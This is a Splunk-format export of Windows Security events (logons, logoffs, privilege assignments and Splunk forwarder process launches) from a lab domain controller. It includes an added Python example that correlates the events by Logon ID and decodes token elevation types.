The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265185
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D042B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:02:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265193
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D1038
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:02:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265192
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D1038
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65059
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:02:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265191
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D1038
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:03:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265194
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265196
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1784
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265195
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b20
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 04:03:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265197
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1620
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 04:03:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265199
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1558
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 04:03:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265198
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 04:03:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265200
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 04:03:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265203
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D4A01
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:03:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265202
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D4A01
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65073
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:03:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265201
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D4A01
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
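The 4634, 4624 and 4672 records above all carry Logon ID 0x8D4A01, which is the join key the 4634 description refers to, and the 4688 records above render Token Elevation Type as the message-resource ID %%1936 rather than the "Type 1" wording in their description. The following Python is an added example, not part of this export and not Splunk or Microsoft tooling. It parses this export layout (timestamp line, key=value header lines, section headings ending in a colon, "Field: value" lines, bare continuation lines for the privilege list), prefixes each field with its section so the Subject and New Logon "Logon ID" values of a 4624 record are kept apart, joins the three logon events per session, and decodes the elevation IDs (the assumption here, which matches Windows' message table, is %%1936, %%1937 and %%1938 for Type 1, 2 and 3). SAMPLE is constructed from this page's records, abbreviated to the fields the code uses.

```python
"""Correlate Windows Security events from a Splunk-style text export.
Added example; SAMPLE is constructed from records on this page."""
import re
from collections import defaultdict
from datetime import datetime

# 4688 writes Token Elevation Type as a message-resource ID, not "Type 1/2/3".
TOKEN_ELEVATION = {"%%1936": "Type 1 (full)", "%%1937": "Type 2 (elevated)",
                   "%%1938": "Type 3 (limited)"}
TS_FMT = "%m/%d/%Y %I:%M:%S %p"
TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")

SAMPLE = r"""04/19/2021 04:03:56 PM
EventCode=4634
Subject:
Account Name: WIN-DC-209$
Logon ID: 0x8D4A01
04/19/2021 04:03:56 PM
EventCode=4624
Subject:
Logon ID: 0x0
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x8D4A01
Network Information:
Source Network Address: ::1
04/19/2021 04:03:56 PM
EventCode=4672
Subject:
Logon ID: 0x8D4A01
Privileges: SeSecurityPrivilege
SeDebugPrivilege
04/19/2021 04:04:07 PM
EventCode=4688
Creator Subject:
Logon ID: 0x3E7
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
"""


def parse_events(text):
    """Split the export into events. Keys are prefixed with their section
    ("Subject/Logon ID" vs "New Logon/Logon ID") because one 4624 record
    carries the same field name under several headings."""
    events, ev, section, last_key = [], None, "", None
    for raw in text.splitlines():
        line = raw.strip()
        if TS_RE.match(line):                 # a timestamp starts a new event
            ev = {"_time": datetime.strptime(line, TS_FMT)}
            events.append(ev)
            section, last_key = "", None
        elif not line or ev is None:
            continue
        elif line.endswith(":"):              # section heading, e.g. "New Logon:"
            section, last_key = line[:-1], None
        elif ": " in line:                    # "Field: value"
            name, value = line.split(": ", 1)
            key = f"{section}/{name}" if section else name
            ev[key] = [value] if name == "Privileges" else value
            last_key = key
        elif "=" in line:                     # Splunk header, e.g. "EventCode=4688"
            name, value = line.split("=", 1)
            ev[name] = value
        elif last_key and isinstance(ev[last_key], list):
            ev[last_key].append(line)         # continuation of the privilege list
    return events


def correlate_sessions(events):
    """Join 4624 (logon), 4672 (privileges) and 4634 (logoff) on Logon ID.
    Logon IDs are only unique until reboot, so correlate within one boot."""
    sessions = defaultdict(dict)
    for ev in events:
        code = ev.get("EventCode")
        if code == "4624":
            sessions[ev["New Logon/Logon ID"]]["logon"] = ev
        elif code == "4672":
            sessions[ev["Subject/Logon ID"]]["privileges"] = ev["Subject/Privileges"]
        elif code == "4634":
            sessions[ev["Subject/Logon ID"]]["logoff"] = ev
    return dict(sessions)


def session_duration_s(session):
    """Seconds from logon to logoff, or None when one side is missing."""
    if "logon" not in session or "logoff" not in session:
        return None
    return (session["logoff"]["_time"] - session["logon"]["_time"]).total_seconds()


def process_creations(events):
    """Flatten 4688 records into parent -> child rows with the decoded token type."""
    p = "Process Information/"
    return [{"image": ev[p + "New Process Name"], "parent": ev[p + "Creator Process Name"],
             "elevation": TOKEN_ELEVATION.get(ev[p + "Token Elevation Type"], "unknown"),
             "creator_logon_id": ev["Creator Subject/Logon ID"]}
            for ev in events if ev.get("EventCode") == "4688"]
```

Two caveats visible in this export: the 4634 for 0x8D4A01 has RecordNumber 265203 while its 4624 has 265202 and its 4672 has 265201, all with the same timestamp, so sort by RecordNumber rather than by file order or timestamp when reconstructing a session; and a 4634 whose Logon ID has no matching 4624 in the window is expected after a reboot, since Logon IDs restart, not evidence of a missing logon.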
04/19/2021 04:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265204
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x570
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265217
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265216
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D58CA
Logon Type: 3
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265215
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D59B8
Logon Type: 3
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265214
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D5A00
Logon Type: 3
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265213
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D5AAE
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65078
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265212
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D5AAE
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265211
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D5A00
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 65077
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265210
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D5A00
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265209
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D59B8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265208
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D59B8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265207
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D58CA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65076
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265206
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D58CA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265205
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bc8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
